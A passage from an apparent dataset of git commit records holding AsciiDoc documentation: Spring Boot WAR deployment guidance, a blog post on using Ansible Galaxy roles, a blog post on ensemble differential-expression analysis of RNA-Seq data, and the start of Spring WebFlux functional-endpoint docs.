`SpringApplication` or\n`SpringApplicationBuilder`). Spring MVC web applications are generally amenable to first\ncreating a deployable war application, and then migrating it later to an executable war\nand\/or jar. Useful reading is in the http:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nCreate a deployable war by extending `SpringBootServletInitializer` (e.g. in a class\ncalled `Application`), and add the Spring Boot `@SpringBootApplication` annotation.\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is just a Spring `ApplicationContext` and\nnormally anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working first.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. Same for `messages.properties` (Spring Boot\ndetects this automatically in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application, using other servlets or filters\nfor instance, then you may need to add some configuration to your `Application` context,\nreplacing those elements from the `web.xml` as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\n container as if it was a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (like a\n `<filter\/>` and `<filter-mapping\/>`.\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\n your `Application`. Or simple cases where annotation configuration is heavily used\n already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war is working we make it executable by adding a `main` method to our\n`Application`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and the `main` method, something like:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntricks.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (e.g. if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to squash all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\nthat doesn't work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. An existing parent context that contains web-specific features will usually\nneed to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to a Spring\nBoot application, and the guidance above might help, but your mileage may vary.\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic would be something like this:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.context.web.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use logback, you will also need to tell WebLogic to prefer the packaged version\nrather than the version that pre-installed with the server. You can do this by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-servlet-2-5]]\n=== Deploying a WAR in an Old (Servlet 2.5) Container\nSpring Boot uses Servlet 3.0 APIs to initialize the `ServletContext` (register `Servlets`\netc.) so you can't use the same application out of the box in a Servlet 2.5 container.\nIt *is* however possible to run a Spring Boot application on an older container with some\nspecial tools. If you include `org.springframework.boot:spring-boot-legacy` as a\ndependency (https:\/\/github.com\/scratches\/spring-boot-legacy[maintained separately] to the\ncore of Spring Boot and currently available at 1.0.2.RELEASE), all you should need to do\nis create a `web.xml` and declare a context listener to create the application context and\nyour filters and servlets. The context listener is a special purpose one for Spring Boot,\nbut the rest of it is normal for a Spring application in Servlet 2.5. Example:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<web-app version=\"2.5\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\">\n\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>demo.Application<\/param-value>\n\t\t<\/context-param>\n\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.boot.legacy.context.web.SpringBootContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<filter>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.DelegatingFilterProxy<\/filter-class>\n\t\t<\/filter>\n\n\t\t<filter-mapping>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\n\t\t<servlet>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextAttribute<\/param-name>\n\t\t\t\t<param-value>org.springframework.web.context.WebApplicationContext.ROOT<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<load-on-startup>1<\/load-on-startup>\n\t\t<\/servlet>\n\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<url-pattern>\/<\/url-pattern>\n\t\t<\/servlet-mapping>\n\n\t<\/web-app>\n----\n\nIn this example we are using a single application context (the one created by the context\nlistener) and attaching it to the `DispatcherServlet` using an init parameter. This is\nnormal in a Spring Boot application (you normally only have one application context).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e99dc2441a8ce7c58864ef9a27a8d89de738c61c","subject":"Delete the file at '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Delete the file at '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"= How a developer could short their way on the Ansible learning\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/galaxy_cover.jpg\n:published_at: 2017-08-18\n:hp-tags: Ansible, Ansible_Galaxy\n:hp-alt-title: ...or how Ansible Galaxy can short your way to awesomeness\n\nYou're a developer and gets starting feeling anxious to learn about Ansible (everybody is talking about it), but you barely know how to list a directory on a Linux machine! Don't worry, you could use your developer skills to learn Ansible and starting doing some magic to build your way towards DevOps in a short time with a little help of Ansible Galaxy.\n\nSo you've learned http:\/\/docs.ansible.com\/ansible\/latest\/intro.html[all the basics of Ansible] and now are arguing yourself: where's the patterns? How do I start using Ansible on a regular basis? How can I do this or that? I'm newbie on OS and I barely know where to start..\n\nI don't know if I'll provide the answers for all these questions, but I may help guide your way through it.\n\nQuoting from the https:\/\/galaxy.ansible.com\/intro[official Ansible Galaxy's documentation]:\n____\nAnsible Galaxy is Ansible\u2019s official community hub for sharing Ansible roles. A role is the Ansible way of bundling automation content and making it reusable.\n____\n\n**Reusable**. That's the word IT people always (or should) care about. Roles on Ansible is a great way to reuse a piece of task that you always have to do when provisioning some environment. I won't extend myself here on how to create a role, for that please take a look on the http:\/\/docs.ansible.com\/ansible\/latest\/playbooks_roles.html[official docs] that you should have your answers.\n\nInstead, I'd like to bring your attention on Ansible Galaxy and how you can reuse someone else's work or contribute to it while learning something great. Galaxy is the https:\/\/hub.docker.com\/[Docker Hub] for docker images or the Github for open source projects. There you'll find a lot of roles people already did so you could take them and orchestrate your playbook on a way that it could do barely anything you need.\n\nSo Ansible Galaxy can help you with: (a) learn by example by looking on the code other people already provided and; (b) create great playbooks by orchestrating with roles that have been done by the community.\n\nLet's take a look on a https:\/\/bitbucket.org\/tecnobizz\/vagrant-alm[project I'm working on] that's provisioning a environment to set up a sort of an https:\/\/en.wikipedia.org\/wiki\/Application_lifecycle_management[ALM process]. For that, I need to provision three servers: https:\/\/jenkins.io\/[Jenkins] for CI\/CD process, https:\/\/www.sonarsource.com\/[SonarSource] for quality analysis and http:\/\/www.sonatype.org\/nexus\/[Nexus] for artifact repository.\n\nTo provision all the three servers requires a lot of vanilla work that I, as an only enthusiast of Ansible and OS in general surely will take *a lot* of time to do so. And we don't have that time, right? Take a deep breath, a couple of coffee and go along with me.\n\n=== 1) Define what you need to do\n\nFirst things first. Draw and write down everything you need to provision: a CentOS machine? Needs NodeJs? Java? PHP? What else? What are the application's requirements? Try to be as detailed as you need to. Take your time to plan your way down the hill, so you'll save time ahead.\n\nFor this project, I just need the aforementioned 3 servers: Jenkins, SonarSource and Nexus on the latest version possible and, of course, everything that implies on it: a database server, JVM, web server and etc. Everything that I know that Ansible may provision for me.\n\n=== 2) Prepare your environment\n\nStart by http:\/\/docs.ansible.com\/ansible\/latest\/intro_installation.html[installing Ansible]. After that, be sure that Ansible Galaxy is on your path by typing this on your console:\n\n```\n$ ansible-galaxy --version\n```\n\nYou should see an output like this:\n\n```\nansible-galaxy 2.3.1.0\nconfig file = \/etc\/ansible\/ansible.cfg\nconfigured module search path = Default w\/o overrides\npython version = 2.7.13 (default, Jun 26 2017, 10:20:05) [GCC 7.1.1 20170622 (Red Hat 7.1.1-3)]\n```\n\nNow configure your `ANSIBLE_ROLES_PATH`. This path is where Ansible Galaxy will save every role you install and where's Ansible will look at when resolving the imports from your playbook. The http:\/\/docs.ansible.com\/ansible\/latest\/galaxy.html#roles-path[default path] is `\/etc\/ansible\/roles`. Make sure that the user who's installing the roles have write permissions. If you are running on your own machine, make it yours:\n\n```\n$ sudo chown -R myuser:myuser \/etc\/ansible\/roles\n```\n\nThen you should work on a virtual machine environment. For that you could use http:\/\/docs.ansible.com\/ansible\/latest\/guide_vagrant.html[Vagrant on top of libvirt].\n\nAnd that's it! You should have your environment set up. For more detailed information about the installation and configuration of Ansible Galaxy, please http:\/\/docs.ansible.com\/ansible\/latest\/galaxy.html[check the docs].\n\n\n=== 3) Looking for roles that you need\n\nSo now you have the plan for what you need to do and the Ansible Galaxy configured on your environment. Let's search for the roles that we need to **compose** our playbook so we can provision all the three servers at once.\n\nRemember that you just need to bring all these roles from the Galaxy repository and run them on a orchestrate fashion to do what you need.\n\nYou have at least three ways to search for roles:\n\n1 - **Ansible Galaxy command line**: \n\n```\n$ ansible-galaxy search *jenkins*\n```\n\nYou'll see a list of roles with the name you provide as an argument. It's a simple and fast way to look for a role, but not my preferable way. This list only provides the name and a short description for the role. This must be suffice if what you are looking for is not so popular. But like the example above, the result may return a lot of options. What to choose?\n\n2 - **Ansible Galaxy Web UI Search**. \n\nGo to https:\/\/galaxy.ansible.com\/[the Ansible Galaxy web site] and start exploring or browsing for a role. Let's use the same example as before and just search for Jenkins. Click on \"Browse Roles\" and type \"Jenkins\" on keyword (or just https:\/\/galaxy.ansible.com\/list#\/roles?page=1&page_size=10&autocomplete=jenkins[click here]). You'll see a nice interface and a sort function that will make all the difference: `Stargazers`. That means we can filter by the most relevant and upvoted roles by the community. Prefer to take that one with the most starts. For this example, the chosen role will be the https:\/\/galaxy.ansible.com\/geerlingguy\/jenkins\/[geerlingguy one].\n\n3 - **Google it**. \n\nThe mindset here is the same as #2, but now you may hit on the Github repository instead of on the Ansible Galaxy web site. Hint: it's almost the same thing. Every Ansible Galaxy project has a Github backed project. So, guess what? It's open and you can (and should) contribute to them.\n\nNow that we have our role(s) we can move forward and start using it.\n\n=== 4) Read the docs, explore their code\n\nFirst things first. Read all available documentation on the project you choose and pay attention on the extension points. These normally are variables you should set to get the role do what you need. Take for example the https:\/\/github.com\/geerlingguy\/ansible-role-java[Geerling Guy's Java role].\n\nOn this role you could set the Java version you want to be installed just by setting the `java_packages` variable.\n\nGo ahead and install the role on your machine:\n\n```\n$ ansible-galaxy install geerlingguy.jenkins\n```\n\nYou have to have internet connection so Ansible could connect on the repository and bring the role and all the dependencies it needs (maven, anyone?). After the installation process, check for the role installed on your system:\n\n```\n$ ansible-galaxy list\n```\n\nYou should see the Jenkins role installed on your system provided with the version and all the other dependencies it needs. Ansible Galaxy works like many others package managers over there: it downloads all other required dependencies so you can work with it without any worries. Remember the Ansible Role's path set on step #2? Try to list the directory and you'll see all the roles there too.\n\nExplore the role's creator work by looking for what the role really do. Start by exploring the `$ANSIBLE_ROLES_PATH\/roles\/geerlingguy.jenkins\/tasks\/main.yml`. Normally this is the starting point of the role and you really could see what's going on. Try to understand their code and how things are been doing there. It's a very nice exercise to learn by example and to absorb concepts harder to get on books or manuals.\n\nAfter that, be comfortable with their code and explore everything else, trying to understand how the pieces are working together to make the role that awesome.\n\n=== 5) Test it\n\nIt's time to enter in the arena and put some bytes to work for you. You have to create your project, so start small and on a directory, create a tree like this one:\n\n```\n\u251c\u2500\u2500 project.yml\n\u251c\u2500\u2500 group_vars\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 all.yml\n\u251c\u2500\u2500 inventory.ini\n\u251c\u2500\u2500 meta\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 main.yml\n\u251c\u2500\u2500 requirements.yml\n```\n\nLet's describe one by one:\n\n1 - `project.yml`: this will be the starting point of your project, so rename it as you pleased. To start using the role we've just installed, open the file and put this on it:\n\n```\n- name: Deploy Jenkins CI\n hosts: jenkins_server\n remote_user: the_user\n become: yes\n\n roles:\n - geerlingguy.jenkins\n```\n\nWe are creating a task to just run the role given it a name, defining a host and the user who will run the process on the target machine. Please note that is beyond of the scope of this post to create a container or a virtual machine where the Ansible will run. I suggest https:\/\/www.ansible.com\/docker[Docker] or https:\/\/www.vagrantup.com\/docs\/provisioning\/ansible.html[Vagrant] to do so.\n\n2 - `inventori.ini` is the file to list the machines Ansible will provision. Read more about it http:\/\/docs.ansible.com\/ansible\/latest\/intro_inventory.html[here]. Remember that the `hosts` property described on #1 should match the host created on this file, for example:\n\n```\n[jenkins_server]\n192.168.0.32\n```\n\n3 - `group_vars\/all.yml`. Remember about the \"role's extension points\" I mentioned on step #4? This file contains all the variables that we need to set to configure the role to do what we want. So, go ahead and define the java version for the Jenkins:\n\n```\njava_packages:\n - java-1.8.0-openjdk\n```\n\nThis variable is mentioned on `geerlingguy.java` role that is a dependency from `geerlingguy.jenkins`. Isn't cool how roles can stick together to do great things?\n\n4 - `meta\/main.yml`. On this file we are going to list all the dependencies we need from the roles:\n\n```\ndependencies:\n - geerlingguy.jenkins\n```\n\nThis way we can tell Ansible that we need this role to perform our tasks.\n\n5 - `requirements.yml`. Besides the name, this isn't a required file for your project, but it's very handy because we can list all Ansible Galaxy's roles that we need and download then with just one command line:\n\n```\n$ ansible-galaxy -r requirements.xml\n```\n\nGo ahead and start to provision. Your Jenkins server should be provisioned on your environment and you can start making CI\/CD jobs.\n\n=== The Bottom Line\n\nNow it's time to shine. Gather every role you could search for that you are going to use on your project and start chaining them together for awesomeness. In a short time you'll be creating your own roles, contributing for the ones already on the community and do a great job on your own playbooks. Just to help you out, take a look https:\/\/bitbucket.org\/tecnobizz\/vagrant-alm[at this project] that I did to provision all the three servers for a ALM process I was talking about at the begining of this post. There I orchestrate a simple playbook to create all the three machines using just three tasks: provision Jenkins, Sonar Source and Nexus.\n\nSee you next time.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5138403ec57defb32e69faa6d4970dac53c910df","subject":"Update 2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","message":"Update 2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","new_file":"_posts\/2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","new_contents":"= Ensemble analysis of Differential Expression from RNA-Seq data sets\n\nRecently I've seen discussions among bioinformatians of which is 'the best' method for DE analysis of RNA-Seq data. It's a recurring theme, and mostly the answer is 'it depends on context and aims' although there is also evidence that some methods are just better than others.\n\nFor the past couple of years, my answer has been that the best method is 'all of them'. I've come round to thinking that an ensemble of methods probably gives the best result most of the time.\n\nThis isn't really a new problem or a new question. Before RNA-Seq was _de rigeur_ for expression experiments, we noticed that in microarray experiments, the list of DE genes varied depending on the method used to estimate DE. In our projects at the time, the 'best' method for DE analysis was a source of regular debate in project meetings among bioinformaticians, or statisticians, or modellers.\n\nWe came to the conclusion that the most robust approach was to use multiple methods, and to correlate them. For example, in this timeseries analysis http:\/\/www.plantcell.org\/content\/24\/9\/3530.full, we used two different methods for estimating whether genes were DE. We then did a manual (or is that visual?) review of the expression profiles of the anomalous cases where only one of the methods score the gene as significantly DE. This review led us to a conclusion about which method was more reliable in the edge cases for this particular data set.\n\nFast forward a bit and the same issue is live in RNA-Seq expression analysis. You've aligned your reads or analysed your kmer content, and have a score or count for each gene or transcript, and you need to decide which tool to use to estimate DE.\n\nThis Venn diagram from Chen et al, 2015 was recently used to give a nice example of the problem:\n\nimage::http:\/\/static-content.springer.com\/image\/art%3A10.1186%2F1471-2164-16-S7-S14\/MediaObjects\/12864_2015_Article_7208_Fig6_HTML.jpg[]\n\nEach method comes up with a different list of genes that are DE. There is some overlap between methods, but it's not immediately clear which method is 'right' or 'wrong' about which particular genes.\n\nMy answer is to believe all the methods, to some extent, and to take an ensemble of methods as my estimate of DE.\n\n*The problem is how to take an ensemble of DE analysis methods.*\n\nMy insight, and my gut feeling, was that when we take the Venn diagram\/p-value cut-off approach, then we throw away most of the information about DE. We demand that genes are DE or not, but actually, there is a whole spectrum from 'almost definitely not DE at all' to 'almost definitely DE'. The analysis tools even make it easy for us by giving an output of q-values, or FDR values for each gene or transcript, that are essentially a metric of 'DE-ness'.\n\nI decided to combine all these separate metrics into a single, ensemble, metric of DE-ness. Being a fettler at heart, I took the obvious approach.\n\n\tI used each tool to generate a ranked order list of all genes,\n sorted by q-value or FDR.\n\tFor each gene, I calculated its sum of ranks, \n by adding up the ranks each individual method had given the gene.\n\tI sorted the gene list by this rank-sum metric.\n\n\nThis gave me a list of genes, sorted from most likely to be DE, as estimated by all the methods, to least likely. Bingo, I have an ensemble DE metric.\n\nThe only thing that remains is to answer that dreaded biologist question \"So which genes are DE?\". The choice of cut-off in the list.\n\nMy view on cut-offs is you cut your list to meet your needs. \n\nIf you want a strict cut-off, because you are going to spend money on follow-up qPCR experiments, then take a cutoff where all genes above the cut-off are assessed as significant by all methods. If you want a lax cut-off, because you want sensitivity, and you are going to follow up with a cheap bioinformatic method like functional enrichment testing, then choose the cutoff accordingly - cut-off at the point where all genes above the cutoff were found significant by at least one method, or at least two.\n\nThis ensemble approach is flexible and extensible to as many different methods of DE assessment as you can choose. My initial choices might be DESeq2, EdgeR, BaySeq, cuffdiff, and limma-voom, because they all have such different models of what it means to be DE, so are likely to form an interesting ensemble. You might prefer your own or different methods. \n\nI think there is a right answer to \"Which methods should I use in my ensemble?\" and I think it is \"All of them\".\n\nThe point is, all methods tend to have a sweet spot where they are particularly sensitive and\/or specific, so the more methods you use in your ensemble, the more potential you have for a generally good ensemble. \n\n\nIn our first public outing for this method (https:\/\/www.ncbi.nlm.nih.gov\/pmc\/articles\/PMC3915549\/) we used three different methods of DE assessment, and we cutoff at the point where at least two methods classified a gene as significant. Our approach was queried by one of our anonymous reviewers. They asked whether this was an accepted method, and whether we could point to evidence that it would work. We responded with logic, rather than direct evidence. We showed that we were using a number of well-cited accepted methods, and correlating their results for robustness. We also showed that the burgeoning fields of Data Science, and competitive mathematical modelling, were rich with examples of ensemble methods outperforming a single method. Our argument was accepted.\n\n\nThe obvious extension of the approach is to start weighting the methods in the ensemble, either based on prior information about how good they are, or where their sweet spots are, or using an iterative approach based on the data in hand. I might get back to that later.\n\n\nHave you used an ensemble method for estimating differential gene expression? Do you think this is a worthwhile approach?\n\n\n","old_contents":"= Ensemble analysis of Differential Expression from RNA-Seq data sets\n\nRecently I've seen discussions among bioinformatians of which is 'the best' method for DE analysis of RNA-Seq data. It's a recurring theme, and mostly the answer is 'it depends on context and aims' although there is also evidence that some methods are just better than others.\n\nFor the past couple of years, my answer has been that the best method is 'all of them'. I've come round to thinking that an ensemble of methods probably gives the best result most of the time.\n\nThis isn't really a new problem or a new question. Before RNA-Seq was _de rigeur_ for expression experiments, we noticed that in microarray experiments, the list of DE genes varied depending on the method used to estimate DE. In our projects at the time, the 'best' method for DE analysis was a source of regular debate in project meetings among bioinformaticians, or statisticians, or modellers.\n\nWe came to the conclusion that the most robust approach was to use multiple methods, and to correlate them. For example, in this timeseries analysis (www.plantcell.org\/content\/24\/9\/3530.full), we used two different methods for estimating whether genes were DE. We then did a manual (or is that visual?) review of the expression profiles of the anomalous cases where only one of the methods score the gene as significantly DE. This review led us to a conclusion about which method was more reliable in the edge cases for this particular data set.\n\nFast forward a bit and the same issue is live in RNA-Seq expression analysis. You've aligned your reads or analysed your kmer content, and have a score or count for each gene or transcript, and you need to decide which tool to use to estimate DE.\n\nThis Venn diagram from Chen et al, 2015 was recently used to give a nice example of the issue: image::http:\/\/static-content.springer.com\/image\/art%3A10.1186%2F1471-2164-16-S7-S14\/MediaObjects\/12864_2015_Article_7208_Fig6_HTML.jpg[]\n\n\n*The problem is how to take an ensemble of DE analysis methods.*\n\nMy insight, and my gut feeling, was that when we take the Venn diagram\/p-value cut-off approach, then we throw away most of the information about DE. We demand that genes are DE or not, but actually, there is a whole spectrum from 'almost definitely not DE at all' to 'almost definitely DE'. The analysis tools even make it easy for us by giving an output of q-values, or FDR values for each gene or transcript, that are essentially a metric of 'DE-ness'.\n\nI decided to combine all these separate metrics into a single, ensemble, metric of DE-ness. Being a fettler at heart, I took the obvious approach.\n\n\tI used each tool to generate a ranked order list of all genes,\n sorted by q-value or FDR.\n\tFor each gene, I calculated its sum of ranks, \n by adding up the ranks each individual method had given the gene.\n\tI sorted the gene list by this rank-sum metric.\n\n\nThis gave me a list of genes, sorted from most likely to be DE, as estimated by all the methods, to least likely. Bingo, I have an ensemble DE metric.\n\nThe only thing that remains is to answer that dreaded biologist question \"So which genes are DE?\". The choice of cut-off in the list.\n\nMy view on cut-offs is you cut your list to meet your needs. \n\nIf you want a strict cut-off, because you are going to spend money on follow-up qPCR experiments, then take a cutoff where all genes above the cut-off are assessed as significant by all methods. If you want a lax cut-off, because you want sensitivity, and you are going to follow up with a cheap bioinformatic method like functional enrichment testing, then choose the cutoff accordingly - cut-off at the point where all genes above the cutoff were found significant by at least one method, or at least two.\n\nThis ensemble approach is flexible and extensible to as many different methods of DE assessment as you can choose. My initial choices might be DESeq2, EdgeR, BaySeq, cuffdiff, and limma-voom, because they all have such different models of what it means to be DE, so are likely to form an interesting ensemble. You might prefer your own or different methods. \n\nI think there is a right answer to \"Which methods should I use in my ensemble?\" and I think it is \"All of them\".\n\nThe point is, all methods tend to have a sweet spot where they are particularly sensitive and\/or specific, so the more methods you use in your ensemble, the more potential you have for a generally good ensemble. \n\n\nIn our first public outing for this method (https:\/\/www.ncbi.nlm.nih.gov\/pmc\/articles\/PMC3915549\/) we used three different methods of DE assessment, and we cutoff at the point where at least two methods classified a gene as significant. Our approach was queried by one of our anonymous reviewers. They asked whether this was an accepted method, and whether we could point to evidence that it would work. We responded with logic, rather than direct evidence. We showed that we were using a number of well-cited accepted methods, and correlating their results for robustness. We also showed that the burgeoning fields of Data Science, and competitive mathematical modelling, were rich with examples of ensemble methods outperforming a single method. Our argument was accepted.\n\n\nThe obvious extension of the approach is to start weighting the methods in the ensemble, either based on prior information about how good they are, or where their sweet spots are, or using an iterative approach based on the data in hand. I might get back to that later.\n\n\nHave you used an ensemble method for estimating differential gene expression? Do you think this is a worthwhile approach?\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d8878e4513abe9d127e78aa0d060b1c23861d71a","subject":"Correct method signature in code example","message":"Correct method signature in code example\n\nCloses gh-1887\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/web\/webflux-functional.adoc","new_file":"src\/docs\/asciidoc\/web\/webflux-functional.adoc","new_contents":"[[webflux-fn]]\n= Functional Endpoints\n\nSpring WebFlux includes a lightweight, functional programming model in which functions\nare used to route and handle requests and contracts are designed for immutability.\nIt is an alternative to the annotated-based programming model but otherwise running on\nthe same <<web-reactive.adoc#webflux-reactive-spring-web>> foundation\n\n\n\n\n[[webflux-fn-overview]]\n== Overview\n\nAn HTTP request is handled with a **`HandlerFunction`** that takes `ServerRequest` and\nreturns `Mono<ServerResponse>`, both of which are immutable contracts that offer JDK-8\nfriendly access to the HTTP request and response. `HandlerFunction` is the equivalent of\nan `@RequestMapping` method in the annotation-based programming model.\n\nRequests are routed to a `HandlerFunction` with a **`RouterFunction`** that takes\n`ServerRequest` and returns `Mono<HandlerFunction>`. When a request is matched to a\nparticular route, the `HandlerFunction` mapped to the route is used. `RouterFunction` is\nthe equivalent of an `@RequestMapping` annotation.\n\n`RouterFunctions.route(RequestPredicate, HandlerFunction)` provides a router function\ndefault implementation that can be used with a number of built-in request predicates.\nFor example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\nimport static org.springframework.web.reactive.function.server.RouterFunctions.route;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> route =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n\n\npublic class PersonHandler {\n\n\t\/\/ ...\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n}\n----\n\nOne way to run a `RouterFunction` is to turn it into an `HttpHandler` and install it\nthrough one of the built-in <<web-reactive.adoc#webflux-httphandler,server adapters>>:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\n\nMost applications will run through the WebFlux Java config, see 